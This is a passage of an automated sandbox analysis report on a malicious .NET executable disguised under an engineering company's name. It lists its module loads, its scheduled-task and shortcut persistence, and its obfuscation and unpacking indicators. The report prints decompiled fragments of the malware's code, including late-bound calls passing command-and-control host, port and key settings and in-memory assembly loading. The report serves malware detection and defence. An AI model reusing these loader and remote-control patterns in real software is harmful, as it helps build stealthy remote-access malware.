Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..lnk.9.dr

LNK file: ..\..\..\..\..\SS Bottmac Engineers Pvt. Ltd..exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SS Bottmac Engineers Pvt. Ltd..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: OPHt.pdb source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr
Source:	Binary string: OPHt.pdbSHA256 source: SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.7830000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4175ad0.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs	.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	.Net Code: bu0KOjBkwv System.Reflection.Assembly.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, Messages.cs	.Net Code: Memory

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786852F push edx; iretd	0_2_0786854A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_0786854B push edx; iretd	0_2_07868552
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868C31 push edi; iretd	0_2_07868C32
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868BBF push esi; iretd	0_2_07868BC2
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868B2B push esi; iretd	0_2_07868B32
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868B29 push esi; iretd	0_2_07868B2A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868AE8 push esi; iretd	0_2_07868AEA
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868A07 push ebp; iretd	0_2_07868A0A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07869A6B pushad ; iretd	0_2_07869A72
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07869A69 pushad ; iretd	0_2_07869A6A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_078699F0 pushad ; iretd	0_2_078699F2
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 0_2_07868919 push esp; iretd	0_2_0786891A
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_03185880 push esp; iretd	9_2_03185CE9
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_0318E2A0 push es; ret	9_2_0318E2B6
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Code function: 9_2_0318E2C0 push es; ret	9_2_0318E2D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04E5634D push eax; ret	12_2_04E56361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_07CC5EB2 push FFFFFF8Bh; iretd	12_2_07CC5EBB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_07CC5E79 push FFFFFF8Bh; iretd	12_2_07CC5E82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E715CD push ebx; ret	17_2_04E715DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B07C push ebp; ret	17_2_04E7B093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7B178 push esp; ret	17_2_04E7B19B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E7633D push eax; ret	17_2_04E76351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_04E76D33 pushfd ; ret	17_2_04E76D3A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_02B3634D push eax; ret	20_2_02B36361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_084973E8 push eax; retf	20_2_084973E9

Source: SS Bottmac Engineers Pvt. Ltd..exe	Static PE information: section name: .text entropy: 7.459719521334949
Source: RTUZKYTc.exe.0.dr	Static PE information: section name: .text entropy: 7.459719521334949
Source: SS Bottmac Engineers Pvt. Ltd..exe.9.dr	Static PE information: section name: .text entropy: 7.459719521334949

Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, z0CgWreVct1ReW3hxU.cs	High entropy of concatenated method names: 'mDAXFkkbHn', 'dctX5MK7Lg', 'g0vX1UHwpQ', 'j6MXTavJ4c', 'Y18XPtIOUL', 'RhBX43i8tY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, nlbUxk0n9w0SE2fT7Q.cs	High entropy of concatenated method names: 'WWIO9AVG3', 'Ne7BnsFyu', 'bD7j21WOg', 'QenwWWX3C', 'K4tAy5db2', 'FVVERgVRY', 'KtUTIYS1GuG3NHE4hT', 'TneXqpwWvj94Synw3e', 'sYqXSVatY', 'EY8VvQfHi'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OZMP2hxHpjh7kQFAPP.cs	High entropy of concatenated method names: 'zHSkBOqRCM', 'fvWkjnFHMI', 'QMUkbnecsd', 'WbRkAByqeu', 'wjyk3yw1ZY', 'bQakUMWAe6', 'PF2kc6KTkL', 'CKJkX9v5wS', 'j9tkMUQEKJ', 'dvnkVTQUiU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, CrrfYkO0sG17BJWtfW5.cs	High entropy of concatenated method names: 'MJiVYtxXQP', 'pBBVgBtZLN', 'eZKVOZRt5b', 'SXM6a1hB2Wh3aOPU4tB', 'aq00efhW0lmUyDNoI29', 'uddTSNhocRZNSkxL8ov', 'BAAsfnh00pMtM1VHsFv', 'L3vXCmhhfrYCZSKbPqy'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, xqcOSno5WVFAjguVYG.cs	High entropy of concatenated method names: 'PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X', 'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, Uuj6qeW9tPXjBmNpHg.cs	High entropy of concatenated method names: 'ToString', 'BxxUm4fk9J', 'Qv0U57V9et', 'gfvU19R5LD', 'YJjUTfT8hJ', 'r4HU4xrivv', 'nnDUDT8Nm7', 'xWNU8CFPl5', 'IFHUQJSC27', 'NkdUhwRTFH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gv9ulKIH2QRgfIOudI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Wo1qJryaEA', 'DqWqI58PXB', 'W3Uqz4ix98', 'J0XS9mcDjl', 'Y0oS6IBJBx', 'Q4JSqtkwUt', 'Ab2SSpPgvw', 'pIlUKKBtDd2wBeZchht'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, MBp5MtOrZjC7IY1p5BK.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g1qVPmxEEJ', 'DRMVvWacuy', 'gRrV0MPdjr', 'X7cVp0KttN', 'MeAVruIKI5', 'EdvVuP6MHE', 'aduV2JUp5X'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, gsQB8HRrROaMJigu8D.cs	High entropy of concatenated method names: 'AnOce1l820', 'HwXcW7xNac', 'ToString', 'NxlcdYfZPl', 'oEycauIgFw', 'Fc6ck42L0Z', 'PHCcCyhJ6e', 'wbrcipe1dp', 'T7vcZ0xLjW', 'VTLcniYyOl'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jVOKqx6OHHAubw6pMN.cs	High entropy of concatenated method names: 'wV4NbIA5QD', 'CUQNAQr6Vs', 'nE6NFKTVhT', 'T1AN5dYyo7', 'vi6NT4mdAu', 'D00N4j8Bxg', 'OlNN8UZn9K', 'P1TNQuolZP', 'oTBNs4HKnn', 'I1ENmDMYmn'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dr4ObpyBXWrmi7HiU1.cs	High entropy of concatenated method names: 't4rSL2c26G', 'SxXSd44Tdi', 'rZxSaJFkXb', 'fiXSkdiHdM', 'Ou0SCt4Dx9', 'G6ySiMIOnA', 'oGQSZfZ18x', 'LSiSnhZ3ll', 'IN7SfWnrA4', 'YvESeiRRFw'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, dJa6sC2NfcTNVggMrM.cs	High entropy of concatenated method names: 'EZ6c7IB2gG', 'wbUcILSSQm', 'QT1X9jI0iR', 'tRkX6YTTiD', 'PWZcmH7bNt', 'iPqct10GRt', 'hPocxEkDp2', 'x1jcPfIGNT', 'xo6cvB2C6B', 'lUwc0vhIE4'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, vBXDN7cPr3ZGX8ky0g.cs	High entropy of concatenated method names: 'vEN6ZLAlPY', 'nlB6nVC6YJ', 'tX36e6QIRP', 'dH76W27ASA', 'fIt63JQWM9', 'plL6UVm9uL', 'GPnvoA4eyKgKhSgeYK', 'Oe5HtK52Gi0QMqiaCu', 'cor66QSbY9', 'Utk6SCP6jg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LuuKNTdSfqNmEuA9vR.cs	High entropy of concatenated method names: 'NyTXdUUnST', 'SAbXaci9UC', 'a1tXkmH6ka', 'biiXCjp2hq', 'aqkXiXthGN', 'aLKXZvFiyM', 'sRAXn1GsPH', 'MbCXfEwaJF', 'OGeXeXX8FR', 'accXWdo6pP'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, iQwA4eOJ8Zfn4HwcUAj.cs	High entropy of concatenated method names: 'cEXMYd4SRm', 'kkeMgRcSuH', 'nCqMOCYQc7', 'bQ7MBqi27n', 'HmbMHmWmU4', 'X7jMjqHQq0', 'CmsMwlGo8d', 'CYoMb6XpQ4', 'afnMAwQsUD', 's3fMEbsAEH'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, LwbRpltv1eAnYuONRA.cs	High entropy of concatenated method names: 'fhw3seLceb', 'x6S3tB16bH', 'vlk3Pk2ZwH', 'zFP3vf2m0M', 'iNu35BAFAo', 'KIU31Tia8Y', 'fdd3T36ZGr', 'zbM34jg97S', 'Mcm3DpfXPH', 'lmv38Hc11g'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, rWZZ7wHORJniJhaBFo.cs	High entropy of concatenated method names: 'Dispose', 'xoF6JoJX1N', 'lcEq57qBiY', 'cfgGG8m4Yr', 'iDr6IHDL7W', 'Wva6ziaYYN', 'ProcessDialogKey', 'sccq928ptv', 'S7vq691ehf', 'YPbqqChRhg'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, OM9lZPwkAKr27WGp6r.cs	High entropy of concatenated method names: 'GV1M60hwBb', 'F4MMSvjG1c', 'qQyMKjlQ04', 'PYaMdml7lZ', 'NJVMaKQwNU', 'NSnMCsgNBB', 'HYRMiaN6mt', 'HwxX2jeeW1', 'JWFX7MXQYH', 'OiJXJw5oEU'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, jO1kLrkP6ITRPB9nRt.cs	High entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.4ac4e70.2.raw.unpack, BCDpIFlNesVBIhQHgH.cs	High entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
